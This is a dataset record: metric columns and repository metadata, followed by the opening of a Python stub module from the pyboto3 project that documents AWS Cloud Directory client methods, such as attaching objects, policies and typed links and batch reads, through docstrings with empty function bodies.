| 0.828514
| 0.813874
| 0.809639
| 0
| 0.006913
| 0.292094
| 86,229
| 2,186
| 121
| 39.44602
| 0.762966
| 0.106832
| 0
| 0.764113
| 0
| 0
| 0.021083
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039651
| false
| 0
| 0.002688
| 0
| 0.071237
| 0.012769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b3e0be69f009eee01ef3f2cdcb3b40bceb2dd1f
| 361,746
|
py
|
Python
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_facet_to_object(DirectoryArn=None, SchemaFacet=None, ObjectAttributeList=None, ObjectReference=None):
"""
Adds a new Facet to an object. An object can have more than one facet applied on it.
See also: AWS API Documentation
Exceptions
:example: response = client.add_facet_to_object(
DirectoryArn='string',
SchemaFacet={
'SchemaArn': 'string',
'FacetName': 'string'
},
ObjectAttributeList=[
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
ObjectReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type SchemaFacet: dict
:param SchemaFacet: [REQUIRED]\nIdentifiers for the facet that you are adding to the object. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n
:type ObjectAttributeList: list
:param ObjectAttributeList: Attributes on the facet that you are adding to the object.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nA reference to the object you are adding the specified facet to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def apply_schema(PublishedSchemaArn=None, DirectoryArn=None):
"""
Copies the input published schema, at the specified version, into the Directory with the same name and version as that of the published schema.
See also: AWS API Documentation
Exceptions
:example: response = client.apply_schema(
PublishedSchemaArn='string',
DirectoryArn='string'
)
:type PublishedSchemaArn: string
:param PublishedSchemaArn: [REQUIRED]\nPublished schema Amazon Resource Name (ARN) that needs to be copied. For more information, see arns .\n
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory into which the schema is copied. For more information, see arns .\n
:rtype: dict
ReturnsResponse Syntax
{
'AppliedSchemaArn': 'string',
'DirectoryArn': 'string'
}
Response Structure
(dict) --
AppliedSchemaArn (string) --
The applied schema ARN that is associated with the copied schema in the Directory . You can use this ARN to describe the schema information applied on this directory. For more information, see arns .
DirectoryArn (string) --
The ARN that is associated with the Directory . For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
:return: {
'AppliedSchemaArn': 'string',
'DirectoryArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
"""
pass
def attach_object(DirectoryArn=None, ParentReference=None, ChildReference=None, LinkName=None):
"""
Attaches an existing object to another object. An object can be accessed in two ways:
See also: AWS API Documentation
Exceptions
:example: response = client.attach_object(
DirectoryArn='string',
ParentReference={
'Selector': 'string'
},
ChildReference={
'Selector': 'string'
},
LinkName='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nAmazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .\n
:type ParentReference: dict
:param ParentReference: [REQUIRED]\nThe parent object reference.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type ChildReference: dict
:param ChildReference: [REQUIRED]\nThe child object reference to be attached to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type LinkName: string
:param LinkName: [REQUIRED]\nThe link name with which the child object is attached to the parent.\n
:rtype: dict
ReturnsResponse Syntax
{
'AttachedObjectIdentifier': 'string'
}
Response Structure
(dict) --
AttachedObjectIdentifier (string) --
The attached ObjectIdentifier , which is the child ObjectIdentifier .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'AttachedObjectIdentifier': 'string'
}
:returns:
DirectoryArn (string) -- [REQUIRED]
Amazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .
ParentReference (dict) -- [REQUIRED]
The parent object reference.
Selector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
ChildReference (dict) -- [REQUIRED]
The child object reference to be attached to the object.
Selector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
LinkName (string) -- [REQUIRED]
The link name with which the child object is attached to the parent.
"""
pass
def attach_policy(DirectoryArn=None, PolicyReference=None, ObjectReference=None):
"""
Attaches a policy object to a regular object. An object can have a limited number of attached policies.
See also: AWS API Documentation
Exceptions
:example: response = client.attach_policy(
DirectoryArn='string',
PolicyReference={
'Selector': 'string'
},
ObjectReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .\n
:type PolicyReference: dict
:param PolicyReference: [REQUIRED]\nThe reference that is associated with the policy object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nThe reference that identifies the object to which the policy will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.NotPolicyException
:return: {}
:returns:
(dict) --
"""
pass
def attach_to_index(DirectoryArn=None, IndexReference=None, TargetReference=None):
"""
Attaches the specified object to the specified index.
See also: AWS API Documentation
Exceptions
:example: response = client.attach_to_index(
DirectoryArn='string',
IndexReference={
'Selector': 'string'
},
TargetReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where the object and index exist.\n
:type IndexReference: dict
:param IndexReference: [REQUIRED]\nA reference to the index that you are attaching the object to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TargetReference: dict
:param TargetReference: [REQUIRED]\nA reference to the object that you are attaching to the index.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'AttachedObjectIdentifier': 'string'
}
Response Structure
(dict) --
AttachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was attached to the index.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.IndexedAttributeMissingException
CloudDirectory.Client.exceptions.NotIndexException
:return: {
'AttachedObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.IndexedAttributeMissingException
CloudDirectory.Client.exceptions.NotIndexException
"""
pass
def attach_typed_link(DirectoryArn=None, SourceObjectReference=None, TargetObjectReference=None, TypedLinkFacet=None, Attributes=None):
"""
Attaches a typed link to a specified source and target object. For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.attach_typed_link(
DirectoryArn='string',
SourceObjectReference={
'Selector': 'string'
},
TargetObjectReference={
'Selector': 'string'
},
TypedLinkFacet={
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
Attributes=[
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the directory where you want to attach the typed link.\n
:type SourceObjectReference: dict
:param SourceObjectReference: [REQUIRED]\nIdentifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TargetObjectReference: dict
:param TargetObjectReference: [REQUIRED]\nIdentifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type TypedLinkFacet: dict
:param TypedLinkFacet: [REQUIRED]\nIdentifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n
:type Attributes: list
:param Attributes: [REQUIRED]\nA set of attributes that are associated with the typed link.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
}
Response Structure
(dict) --
TypedLinkSpecifier (dict) --
Returns a typed link specifier as output.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def batch_read(DirectoryArn=None, Operations=None, ConsistencyLevel=None):
"""
Performs all the read operations in a batch.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_read(
DirectoryArn='string',
Operations=[
{
'ListObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123,
'FacetFilter': {
'SchemaArn': 'string',
'FacetName': 'string'
}
},
'ListObjectChildren': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListAttachedIndices': {
'TargetReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListObjectParentPaths': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'GetObjectInformation': {
'ObjectReference': {
'Selector': 'string'
}
},
'GetObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'AttributeNames': [
'string',
]
},
'ListObjectParents': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListObjectPolicies': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListPolicyAttachments': {
'PolicyReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'LookupPolicy': {
'ObjectReference': {
'Selector': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListIndex': {
'RangesOnIndexedValues': [
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'IndexReference': {
'Selector': 'string'
},
'MaxResults': 123,
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'ObjectReference': {
'Selector': 'string'
},
'FilterAttributeRanges': [
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'FilterTypedLink': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'ListIncomingTypedLinks': {
'ObjectReference': {
'Selector': 'string'
},
'FilterAttributeRanges': [
{
'AttributeName': 'string',
'Range': {
'StartMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'StartValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'EndMode': 'FIRST'|'LAST'|'LAST_BEFORE_MISSING_VALUES'|'INCLUSIVE'|'EXCLUSIVE',
'EndValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
],
'FilterTypedLink': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'NextToken': 'string',
'MaxResults': 123
},
'GetLinkAttributes': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'AttributeNames': [
'string',
]
}
},
],
ConsistencyLevel='SERIALIZABLE'|'EVENTUAL'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory . For more information, see arns .\n
:type Operations: list
:param Operations: [REQUIRED]\nA list of operations that are part of the batch.\n\n(dict) --Represents the output of a BatchRead operation.\n\nListObjectAttributes (dict) --Lists all attributes that are associated with an object.\n\nObjectReference (dict) -- [REQUIRED]Reference of the object whose attributes need to be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of items to be retrieved in a single call. This is an approximate number.\n\nFacetFilter (dict) --Used to filter the list of object attributes that are associated with a certain facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\n\n\nListObjectChildren (dict) --Returns a paginated list of child objects that are associated with a given object.\n\nObjectReference (dict) -- [REQUIRED]Reference of the object for which child objects are being listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --Maximum number of items to be retrieved in a single call. This is an approximate number.\n\n\n\nListAttachedIndices (dict) --Lists indices attached to an object.\n\nTargetReference (dict) -- [REQUIRED]A reference to the object that has indices attached.\n\nSelector 